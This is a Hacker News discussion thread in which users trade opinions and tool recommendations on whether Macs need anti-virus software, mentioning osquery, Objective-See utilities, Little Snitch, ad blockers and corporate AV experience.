
Ask HN: Is no anti-virus software still best practice for mac? - _justinfunk
Just checking in on the community. I haven&#x27;t found anything that suggests I should change my best-practices of not running and not suggesting others run anti-virus packages on their MacOS machines.<p>Is this still best-practice in the wider community?
======
AnIdiotOnTheNet
It is my considered opinion that "no anti-virus" is still the best practice
for nearly everything. About the only place it makes any sense is in your
email filters or anywhere else the public can send random bullshit.

At best they incur an ever present performance hit while only catching the
lowest of low-hanging fruit. At worst they are constantly getting in your way
with false positives (which train you to ignore any potentially legitimate
alerts) and breaking everything. And the for profit ones tend toward the
latter, because if you never notice it you won't believe it is actually doing
anything and might not continue your subscription.

You might be thinking "that's all well and good for us computer geeks who know
what's what, but what about everyone else?". Most people aren't as dumb as
your ego likes to imagine them to be. They may not know the details of how
their computers work but they know sketchy looking crap when they see it. And
if they are that dumb then nothing will help them anyway.

No matter how you slice it, the cost/benefit pretty much never favors AV.

~~~
azinman2
“Most people aren't as dumb as your ego likes to imagine them to be. They may
not know the details of how their computers work but they know sketchy looking
crap when they see it.”

That’s simply not true. Like, at all. If it were, then viruses and malware
wouldn’t be spreading like they are, especially phishing campaigns. I know
many very smart people who have been compromised.

I also take issue with the word “dumb” — “smart” people can be caught off
guard as well. Not everything looks sketchy, as good phishing does everything
right to make you think it’s all ok.

It’s a really difficult type of software to create, and perhaps there’s room
for new computer vision type anti-viruses to find look-a-like websites, but
normal humans need all the help they can get!

~~~
hluska
I agree with what you're saying, but it's worth noting that the kinds of
attacks you're talking about cannot be reliably stopped by anti-virus.

Instead, they're stopped by almost constant security training. And, I'd argue
that if your security training is good enough to get people to recognize
phishing, spearphishing and the ilk, it's good enough to get them to recognize
the kinds of low hanging fruit that reactive anti-virus software protects
against.

------
atom_enger
In a corporate setting: At Etsy we use OSQuery on all of our corp
machines(macOS) to help with malware/virus detection. We use community rules:
[https://github.com/facebook/osquery/blob/master/packs/osx-
at...](https://github.com/facebook/osquery/blob/master/packs/osx-attacks.conf)

In addition to community rules we also curate a bunch of rules in house from
malware we've discovered across our fleet. We then aggregate this info into
ELK and alert on it.

At Home: OSQuery as well + tiny elk stack + Elastalert. Overkill for a typical
home setup but I like it.

~~~
k_lander
Got any links to articles to walk through getting this set up?

~~~
fritzx6
[https://blog.kolide.com/monitoring-macos-hosts-with-
osquery-...](https://blog.kolide.com/monitoring-macos-hosts-with-osquery-
ba5dcc83122d)

Hope that helps!

I would also recommend joining the osquery slack: [https://osquery-
slack.herokuapp.com/](https://osquery-slack.herokuapp.com/)

~~~
atom_enger
nice thanks for the assist Zach!

------
rb808
My approach is to make my PC disposable. With all cloud services its a lot
easier than it used to be. IE

* Working code in github

* Photos in offline multiple HDD

* Docs in cloud servers and important ones printed out.

This way I dont really care if I get a virus, or gets stolen, or destroyed in
fire or HDD crash etc. I actually locked myself out of my encrypted laptop and
it didnt really matter - I just reinstalled everything.

I also think anti-virus is more trouble than its worth now, but am more
assured as above.

~~~
mbeattie
Why would you have bothered encrypting the laptop if everything is in the
cloud/elsewhere anyway?

~~~
asperous
You would still want to encrypt since sensitive data might be cached on the
hard drive in plain text or credentials stored in an insecure way.

------
binaryanomaly
Have one but never needed it so far - or it didn't catch the virii ;)

I use bitdefender at least it's quite unobtrusive on mac (sick of the windows
version!). Sophos is free and afaik not too bad if you need one:
[https://home.sophos.com/free-mac-antivirus](https://home.sophos.com/free-mac-
antivirus)

Further I use: \- [https://objective-
see.com/products/knockknock.html](https://objective-
see.com/products/knockknock.html) \- [https://objective-
see.com/products/oversight.html](https://objective-
see.com/products/oversight.html) \- [https://objective-
see.com/products/blockblock.html](https://objective-
see.com/products/blockblock.html)

and Little Snitch \-
[https://www.obdev.at/products/littlesnitch/index.html](https://www.obdev.at/products/littlesnitch/index.html)

and Firefox with \-
[https://github.com/gorhill/uMatrix](https://github.com/gorhill/uMatrix) \-
[https://github.com/gorhill/ublock](https://github.com/gorhill/ublock)

Hope that keeps the pest away ;)

~~~
submeta
I use bitdefender as well, but lately I started deactivating "autopilot" (auto
scanning folders in the background) because it pushes my cpu usage to > 100%
regularly while I am using my Mac.

~~~
binaryanomaly
I fortunately do not have that problem, yet. But the autopilot stuff and other
weird stuff bitdefender is doing autonomously is exactly why i may ditch it
soon. Will probably switch to sophos once it happens.

------
hluska
Are these machines part of a cardholder data environment (as defined by PCI-
DSS)?

If the answer to that is 'yes', honestly, just suck it up and install it. It
will be cheaper, easier and far less annoying to install some AV in your CDE
than to have to explain why you didn't in the event of a breach.

(Note --- Post breach audits are my personal definition of hell.)

Otherwise, anti-virus is reactive and tends to protect against the lowest
hanging fruit, all while introducing a real cost to everything else you do on
that machine. Personally, I'd skip AV and just do a bit of security training.

------
acoye
Well MacOS (an Windows) have built-in ones. MacOS has XProtect between other
things like app signing.

Also note that for Spectre and Meltdown 3rd party antivir had kernel patches
delayed as they can become sort of an issue.

------
tekstar
I don't run traditional antivirus but I do run:

[https://objective-see.com/products/blockblock.html](https://objective-
see.com/products/blockblock.html) (free) Detects when software attempts to
install itself to run at startup and lets you block the registration.

[https://www.obdev.at/products/littlesnitch/index.html](https://www.obdev.at/products/littlesnitch/index.html)
(paid) detects, reports, blocks applications connecting to the internet.

[https://adguard.com/en/welcome.html](https://adguard.com/en/welcome.html)
(paid) High quality adblocker for safari.

~~~
jbob2000
I am super skeptical about ad guard and I'm looking for someone to allay that
skepticism. It's just... too clean. I don't trust software _this_ perfect,
especially since it's made in Russia and sees all the internet traffic on my
computer.

~~~
tekstar
I didn't know it was made in Russia! Up until now I've had a good experience,
and trusted reviews.

But as an experiment I just tried removing the little snitch filter that lets
adguard create all outgoing connections. it looks like adguard will request
some or all requests that my web browser makes (like, it'll also request JS
from slack or facebook). This might be because it detects and blocks crypto
miner JS, or maybe some other heuristics. So far it hasn't tried to phone home
but it's hard to look for that with little snitch when it's trying to connect
to every site I browse to.

~~~
jbob2000
Yeah, I ran their free trial and had a good experience. I did the same kind of
tests you did, but I still don't feel comfortable with it. It's just too
slick. That mixed with the fact that their entire team is Russian nationals...
I dunno. Too sketchy.

------
mc32
Even if people aren’t targeting Macs, if you comms with people using other
OSes, it’s good citizenship to ensure your machine is not a host vector.

------
johnklos
Macs are excellent about making it difficult to run and install things,
accidentally or otherwise. If someone can't listen to simple instructions
about not "updating Flash" or not installing a "PDF plugin", anti-virus isn't
going to stop them. In cases like that, it's better to focus on the problem,
not the symptom.

To pick some nits, viruses are self-replicating. There are no viruses on Macs
(yet). There are tons of Trojans. It's a big and important difference, but we
obviously can't count on sensationalistic media to care about the difference.
The more technical people here on HN, though, should know and care.

------
lorenzhs
One of the best anti-virus tools on any platform is a good adblocker (I prefer
ublock origin). It completely removes large classes of infection sources
(malvertising, fake download buttons, etc). Then disable macros in office
products. If every IT department did that, they’d have much more time for
useful work.

Whether you use antivirus or not, use an adblocker. Keeping broken
monetisation strategies alive is not your job, keeping your data safe is.

~~~
AnIdiotOnTheNet
I really wish we could disable macros, but it turns out the hoops we'd have to
jump through just so accounting could continue to do their jobs wasn't worth
the effort.

I'm sure some academic out there will berate me for not insisting that we
disassemble an entire department's workflow and rewrite it in SQL with some
web frontend, but I work in the real world where costs need to be justified
and the truth is they couldn't be. There were much simpler and cheaper ways to
mitigate the threats we were worried about.

Ad blocking interferes with the Marketing Department occasionally but covers
such a huge range of problems that it really is worth it.

------
protomyth
Normally, I would say no, but recently, I've been thinking a bit differently
on the matter. At minimum a good ad blocker is needed, and even with that some
things are getting through. If the general technical experience level of the
user is low to medium, I would seriously consider a virus protector.

On the same note, Deep Freeze for those of you who have to deal with a bunch
of Windows machines in a lab or library situation is amazing.

------
BjoernKW
I don’t think it’s particularly widely used but in my opinion using antivirus
software is a matter of good hygiene, even if the system you run isn’t prone
to being infected by viruses.

For example, I occasionally receive Office documents or ZIP archives from
clients.

If those should contain viruses these likely won’t affect my Mac but I can
inform my client about this, help him fix his security issues and prevent
viruses from spreading even further.

------
uniacid
You have a few different options based on the comments here like locking down
incoming/outgoing traffic with little snitch or other tools out there.

I would definitely recommend Avast though if you are concerned about safety,
I've used it for some time now off and on and it does a good job of filtering
pretty much any file based viruses as well as internet and email based
exploits.

\- [https://www.avast.com/en-us/free-mac-security](https://www.avast.com/en-
us/free-mac-security)

------
wand3r
I use objective-see suite of products like little snitch (well their new open
source version named something different), knock-knock, block-block and kext-
viewer. They are all free and let you know what is going on without tryinb to
manage everything. They also have a simple menu item that lets you know if
youre camera is hijacked. I like their sodtware

------
vbezhenar
I never used any third-party antivirus software. AFAIK both Windows and macOS
have built-in antivirus software, although I think that it's not required
either. Properly patched software to minimize risk of RCE vulnerability and
brain to avoid running untrusted programs should be enough.

~~~
alpb
macOS does not have built-in antivirus software, hence the question.

~~~
vbezhenar
I believe it's called XProtect. It checks files with known virus signatures.

------
arzel
Nowadays I just figure it's common sense on what to install/what not to
install.

I personally haven't ever used an Antivirus on my Mac. If you believe you
'need' one, I recommend MalwareBytes.

------
45h34jh53k4j
you need AV on your corporate macs. No excuses.

For those in "my enterprise doesnt need AV, because AV is stupid" camp: In the
last week, the enterprise AV:

* Blocked 15 cryptominers * Blocked 3 email based ransomware attachments * Blocked 6 phishing emails * Blocked 3 installs for MacKeeper (PUA) * Found 4 other adware-type infections on hosts

Without it, these things would have hit the organisation. AV -- it will catch
the lowest hanging fruit. You need this. It is necessary, but not sufficient.

~~~
ken
This [1] post last year pointed to Google Project Zero, which found dozens of
exploits in popular AV software. What if your third-party AV _is_ your lowest
hanging fruit? How many issues did your AV itself cause? How would you know?

[1]: [https://robert.ocallahan.org/2017/01/disable-your-
antivirus-...](https://robert.ocallahan.org/2017/01/disable-your-antivirus-
software-except.html)

~~~
45h34jh53k4j
Im aware of the research p0 did on AV -- its very important, and their
findings were fed back to the vendors, to improve their products. AV is not
the low hanging fruit, there has never been a discovered malware that exploits
an AV bug. It might happen, but you are a million times more likely to find a
garden variety malware that all AV detects.

(of course i am ignoring APT/nation state 0day, as it is not specifically
about AV, all software is vulnerable against an adversary of this skill). If
you worry is APT attacking your AV, you best to be looking at your Operating
Systems first.

------
jccalhoun
I just got in trouble at work today for booting my computer from an external
drive to bypass the antivirus laden computer I have to use normally.

------
gaius
I use BitDefender, which also has various web privacy features and a VPN.

However it interacts annoyingly with RStudio despite being told repeatedly to
trust it.

~~~
binaryanomaly
BitDefender is quite a pain if it ever gets in your way. They really did a bad
job there wouldn't buy it again.

------
frankzander
In my opinion it's also the best practice for windows. But never without ad-
blocker like ublock.

------
choward
As far as I'm concerned, anything not open source is a virus.

------
rightos
Little Snitch is all you need.

------
NameNickHN
No anti virus software is even best-practice for Windows. At least third party
anti virus software.

------
jraph
At INRIA (a French computer science research institute), AV became mandatory
on Macs last year.

A colleague of mine got hit recently by a crypto-miner on their Mac. I don't
know if they had an AV, and if so, if the AV would have caught the miner. This
was detected by the IT department by monitoring suspicious traffic.

I don't use a macOS so I can't really say. I see AVs as another piece of
proprietary software that you have to trust, and that takes significant
resources without knowing how useful they are.

On Windows, I would probably use the one from Microsoft, since it's free and
since I would already "trust" Microsoft by using their OS and I would somewhat
bet that it is in their interest to keep their OS safe. I can't be sure tough:
why is it not integrated by default (or is it?)? To allow competition? Then is
Microsoft making their antivirus less efficient so the competition is still
relevant? And maybe AV is not really Microsoft's main business so their
antivirus may be lacking?

On the other side, I would bet it is in the interest of other AVs to always
nag you and make you feel they are present and useful more than being actually
efficient for other things than high detection rates in benchmarks.

They are irritating and advertise themselves in people's mail signatures,
sometimes outright lying: "this email as no viruses" \- That you can't be
sure, and the mail could have got a virus in its way between the sender and
the recipient.

By design, AVs can't really detect new viruses and I would not feel really
more confident with an AV than without because of that. AVs didn't catch
ransomwares when they first appeared after all.

I don't use any antivirus. My approach to security is:

\- Using only free software, as much as possible (I know, I would need to
audit everything I use for this to be perfect, but I can't possibly do that).

\- that is preferably installed from the OS vendor, which I have no choice to
trust anyway.

\- usage of an ad blocker with more filters than the default

\- be careful where clicking links

\- instant backups in a self hosted cloud for important things, and automatic
daily snapshots of this cloud somewhere else

\- and I also happen to never be browsing sketchy websites.

\- all this is true on my phone as well.

One could add usage of Google safe browsing or something related for phishing.
And also blocking Javascript or third party Javascript by default when
browsing, which I did at some point in my life but which is not convenient for
most people.

Would I recommend AV for somebody who uses an OS that is more targeted by
viruses than mine, and is likely to fell in a trap (the kind of trap an AV
would catch anyway)? Probably Windows Defender on Windows, for Macs I really
don't know. If there is an AV provided by Apple or by some other company you
trust, I guess I would go for it rather than having nothing.

You can always get viruses from the network that will silently exploit an
unfixed security breach on any system, and that may remain undetected so at
least, I would tell them to be careful, to keep their system updated and to
make backups regularly (ideally, backups should be automatic to some extent),
since AVs can't guarantee that no virus will make it.

I would make sure that they are not too confident in the AV, too.

------
czbond
If you are an employee or contractor - your risk is higher than you might
think. As an employee, if you do 'non-work' activity on your laptop that
compromises it's integrity - you could be at actual monetary/legal risk. I
would highly recommend you have one. Also, as a contractor you run a higher
risk. With Mac, configure your built in firewall. Run a "paid for" version of
Bitdefender or other. Use VPN ad blocking. Use LTE connections, not wi-fi, for
VPN connections.

~~~
drdaeman
> Use LTE connections, not wi-fi, for VPN connections

I'd get it for non-VPN, but for VPN connections - how does it matter? As long
as peers properly authenticate each other, of course.

> If you are an employee or contractor - your risk is higher

Higher than whose risk?

~~~
elif
No idea if this is was the commenter was implying, but I think the advice is
because plenty of apps can send requests in the 1 second initial window as you
authenticate your VPN.

In theory, that could be sensitive data or enable a sophisticated attacker to
correlate you with your VPN exit (if you were using it for pseudo-anonymity).

I don't think key negotiation is compromised in any way...

